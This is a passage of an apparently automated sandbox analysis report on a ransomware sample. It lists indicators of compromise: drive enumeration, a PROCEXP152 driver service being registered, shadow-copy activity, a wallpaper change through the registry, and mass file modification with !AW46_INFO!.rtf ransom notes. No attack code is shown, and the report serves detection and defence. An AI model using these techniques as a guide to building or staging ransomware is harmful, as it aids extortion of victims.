opened for modification C:\Users\Admin\Pictures\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\TGVUK4BG\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Public\Videos\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Public\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Public\Music\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AJM03J3Y\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Public\Documents\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\L: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\J: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\B: jigPt9cX64.exe File opened (read-only) \??\N: jigPt9cX64.exe File opened (read-only) \??\U: jigPt9cX64.exe File opened (read-only) \??\Y: jigPt9cX64.exe File opened (read-only) \??\O: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\H: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\P: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\I: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\I: jigPt9cX64.exe File opened (read-only) \??\Z: jigPt9cX64.exe File opened (read-only) \??\X: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\S: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\E: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\F: jigPt9cX64.exe File opened (read-only) \??\J: jigPt9cX64.exe File opened (read-only) \??\L: jigPt9cX64.exe File opened (read-only) \??\V: jigPt9cX64.exe File opened (read-only) \??\T: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\Q: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\M: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\F: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\A: jigPt9cX64.exe File opened (read-only) \??\E: jigPt9cX64.exe File opened (read-only) \??\P: jigPt9cX64.exe File opened (read-only) \??\W: jigPt9cX64.exe File opened (read-only) \??\X: jigPt9cX64.exe File opened (read-only) \??\W: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\U: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\N: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\K: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\G: jigPt9cX64.exe File opened (read-only) \??\K: jigPt9cX64.exe File opened (read-only) \??\M: jigPt9cX64.exe File opened (read-only) \??\Q: jigPt9cX64.exe File opened (read-only) \??\Y: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\G: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\H: jigPt9cX64.exe File opened (read-only) \??\O: jigPt9cX64.exe File opened (read-only) \??\T: jigPt9cX64.exe File opened (read-only) \??\V: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\R: 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened (read-only) \??\R: jigPt9cX64.exe File opened (read-only) \??\S: jigPt9cX64.exe -
Modifies service 2 TTPs 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152 jigPt9cX64.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" jigPt9cX64.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\Type = "1" jigPt9cX64.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ErrorControl = "1" jigPt9cX64.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\Start = "3" jigPt9cX64.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152 jigPt9cX64.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\UzFx8zyz.bmp" reg.exe -
Drops file in Program Files directory 3060 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Rome 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-8 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Krasnoyarsk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\unpack200.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belem 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EST 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Dublin 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\00_musicbrainz.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\3RDPARTY 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.attach_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\pt-PT.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Troll 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Johannesburg 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Volgograd 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\java-rmi.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\v8_context_snapshot.bin 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.filesystem_1.4.100.v20140514-1614.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\weblink.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+2 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Fortaleza 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\th.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Perth 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\manifest.json 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Atikokan 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bangkok 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface_3.10.1.v20140813-1009.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santo_Domingo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Seoul 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\sl.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\LimitMeasure.xltx 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-mx.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\security\cacerts 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Winamac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\uarrow.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Creston 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.descriptorProvider.exsd 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfig.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Qatar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\smtp.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Flash.mpp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Brunei 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Magadan 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Tripoli 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX8.x3d 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nipigon 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text_3.9.1.v20140827-1810.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\simplexml.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dialog.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\HST10 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tokyo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.ja_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Almaty 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-util.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\3difr.x3d 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\updater.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Updater.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\WriteSet.ps1 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\St_Johns 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Simferopol 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Helsinki 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Brisbane 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\removed-files 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Salta 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_win.css 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program 